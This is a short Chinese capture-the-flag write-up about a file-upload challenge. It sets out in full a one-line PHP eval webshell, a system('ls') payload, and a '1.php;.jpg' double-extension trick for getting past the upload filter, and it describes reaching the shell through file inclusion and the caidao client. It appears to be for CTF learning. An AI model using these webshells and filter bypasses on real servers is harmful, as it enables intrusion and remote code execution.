本文详细介绍了如何通过构造特殊文件名和利用文件上传漏洞,绕过系统过滤,上传WebShell并成功获取Flag的过程。同时提供了两种不同的思路和具体操作步骤。
Step1:查看源码
发现注释文件upload.php,访问下来到文件上传页面
Step2:上传一句话
普通一句话会被过滤,这里构造<?=eval($_POST['shell']);>
保存文件修改后缀为1.php;.jpg,成功上传
根据提示是文件包含,直接访问文件路径无效,菜刀无法连接
包含文件进行访问是空白页面,再进行菜刀连接
Step3:上菜刀
发现一个文件名很长的txt文件,打开就是flag
另一种思路是简书上看到的,在这里也po出来以供参考
在php文件里写入<script language=php>system("ls")</script>,列当前目录
同理,修改后缀名为jpg,如1.php;.jpg,上传成功
访问直接可以看到flag文件
包含或者直接访问都可以得到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
